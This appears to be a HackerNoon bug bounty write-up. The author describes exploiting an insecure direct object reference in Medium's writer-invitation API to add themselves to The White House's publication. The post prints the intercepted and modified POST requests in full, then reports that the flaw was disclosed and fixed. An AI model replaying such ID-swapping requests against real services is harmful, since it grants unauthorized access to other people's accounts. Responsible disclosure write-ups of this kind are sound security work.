![](https://hackernoon.com/hn-images/1*Qk06Im5UWvoQoIOUeSxCOg.jpeg)

Image from [http://www.wellesley.edu](http://www.wellesley.edu/sites/default/files/assets/dailyshot/2016/collegereporter_b_tablet.jpg)

While I was riding home with an Uber, I received an email from Medium about its 5 new features. One of those is the **_Invite Writers_** feature.

![](https://hackernoon.com/hn-images/1*hHJayh21h3lAmIzm1kkj_g.png)

Email from Medium

They’ve got new features so there’s a possibility that there’s a [security](https://hackernoon.com/tagged/security) issues. Then, I started testing the new feature by inviting my second email in my own publication to test how does the feature works. While doing the inviting process, I opened a tool and intercepted the [HTTP](https://hackernoon.com/tagged/http) POST Request then I got this:

POST /\_/api/collections/**_62fcbc0a9209_**/invited-authors HTTP/1.1  
Host: [medium.com](http://medium.com/)  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:49.0) Gecko/20100101 Firefox/49.0  
Accept: application/json  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
X-Obvious-CID: web  
X-XSRF-Token: NDZnMsyhRddws0sV  
X-Client-Date: 1479216955226  
Content-Type: application/json  
Referer: [https://medium.com/secuna/edit](https://medium.com/secuna/edit)  
Content-Length: 41  
Cookie: {Redacted}  
Connection: close

{“email”:”example@domain.com”}

Look at the top line of the code and find the value after /collections/.

**_62fcbc0a9209_** is the Collection ID of [Secuna](https://blog.secuna.ph/) and it quickly reminds me that this kind of request is possibly vulnerable to [Insecure Direct Object Reference](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_%28OTG-AUTHZ-004%29) or also known as [IDOR](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_%28OTG-AUTHZ-004%29). So, without hesitation I searched for The White House’s Medium Publication and grabbed its Collection ID.

The White House’s Collection ID: 51210352003f

After grabbing the Collection ID of The White House, I modified the HTTP Post Request and change the Collection ID from my publication’s collection ID to The White House’s Collection ID.

POST /\_/api/collections/**_51210352003f_**/invited-authors HTTP/1.1  
Host: [medium.com](http://medium.com/)  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:49.0) Gecko/20100101 Firefox/49.0  
Accept: application/json  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
X-Obvious-CID: web  
X-XSRF-Token: NDZnMsyhRddws0sV  
X-Client-Date: 1479216955226  
Content-Type: application/json  
Referer: [https://medium.com/secuna/edit](https://medium.com/secuna/edit)  
Content-Length: 41  
Cookie: {Redacted}  
Connection: close

{“email”:”example@domain.com”}

Then I submitted the HTTP POST Request above and I got a **_200 OK_** HTTP Response which means, I successfully invited myself as a Writer for The White House’s Medium Publication.

After 3 seconds, I got an email from medium with an invitation link.

![](https://hackernoon.com/hn-images/1*Pvyri4VO7hoWYieRI_PPaA.png)

Invitation Link from The White House

And Wee!

![](https://hackernoon.com/hn-images/1*O0MI13TaMeg-1rK-xBA1Wg.png)

After I found the severe security issue, I immediately reported it to Medium’s Security Team. And In just 9 hours, they fixed it and rewarded me with a $250 bounty.

I’m happy yet too sad at the same time because they removed me from The White House’s Medium Publication.(haha)

![](https://hackernoon.com/hn-images/1*S9gbzHzpncoeWz2UlMZtkw.png)

Seriously, I am so happy because I helped Medium again making their platform more secure by finding and reporting security vulnerabilities. I’m also the one who found a bug that allows to [Update and Delete any Story on Medium.](https://hackernoon.com/update-and-delete-any-story-of-any-user-on-medium-8b6a609c9bbe#.15gz819kf)

Mozilla

Uber

Too Long; Didn't Read

Cassandra Forward a free Cassandra-focused community event

How I invited myself as a Writer of The White House’s Medium Publication

Too Long; Didn't Read

Companies Mentioned

@ajdumanhug

RELATED STORIES